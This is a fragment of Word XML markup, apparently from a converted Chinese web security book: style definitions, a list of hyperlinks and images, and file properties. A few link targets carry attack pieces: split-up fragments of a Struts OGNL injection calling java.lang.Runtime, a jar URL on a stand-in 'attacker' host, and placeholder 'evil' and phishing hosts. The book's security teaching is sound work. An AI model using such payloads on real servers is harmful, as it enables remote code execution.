    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="61"/>
      <w:ind w:right="17"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="904" w:hanging="701"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading4" w:type="paragraph">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="1052" w:hanging="849"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading5" w:type="paragraph">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="79"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading6" w:type="paragraph">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="144"/>
      <w:ind w:left="594"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="ListParagraph" w:type="paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="2120" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TableParagraph" w:type="paragraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="37"/>
      <w:ind w:left="263"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSu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mailto:zlts@phei.com.cn" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:dbqq@phei.com.cn" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:opensystem@gmail.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/aullik5" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t.qq.com/aullik5" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://weibo.com/n/aullik5" TargetMode="Externa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hyperlink" Target="http://staff.washington.edu/dittrich/misc/ssh-analysis.txt" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><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hyperlink" Target="http://evil/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/aullik5/blog/item/d4b8c81270601c3fdd54013e.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/aullik5/blog/item/60d2b5fc2524c30a09244d0c.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phpweblog.net/GaRY/archive/2010/12/10/PHP_is_geliavable_now.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.80sec.com/nginx-securit.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:security@php.net" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.a.com/test.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.qidian.com/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><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hyperlink" Target="http://twitter.com/home?status=Yes" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://disenchant.ch/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://disenchant.ch/powered.jpg" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ph4nt0m.org/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://img.baidu.com/hi/img/portraitn.jpg" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/aullik5/blog/item/e031985175a02c6785352416.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/xisigr/blog/item/2c2b7a110ec848f0c2ce79ec.html" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/xisigr" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclab.stanford.edu/websec/framebusting/tapjacking.pdf" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mylookout.com/look-10-007-tapjacking/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vimeo.com/17648348" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://twitter.com/swedishgoose" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclab.stanford.edu/websec/framebusting/framebust.pdf" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.chromium.org/2010/01/security-in-depth-new-security-features.html" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mozilla.com/security/2010/09/08/x-frame-options/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://noscript.net/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/security.magicquotes.php" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.a.com/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phishing.tld/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/exploits/14360/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mydomain/MyStruts.action?(%27\u0023_memberAccess" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:)%26(asdf)((%27\u0023rt.exit(1)%27)(\u0023rt\u003d@java.lang.Runtime@getRunti" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:u003d@java.lang.Runtime@getRunti" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/foo/bar.action" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://struts.apache.org/2.x/docs/security-bulletins.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker/attack.jar!/" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header19.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId9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2017-11-03T09:31:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-03T09:31:42Z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2012-03-21T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Adobe Acrobat Pro 9.0.0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2017-11-03T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>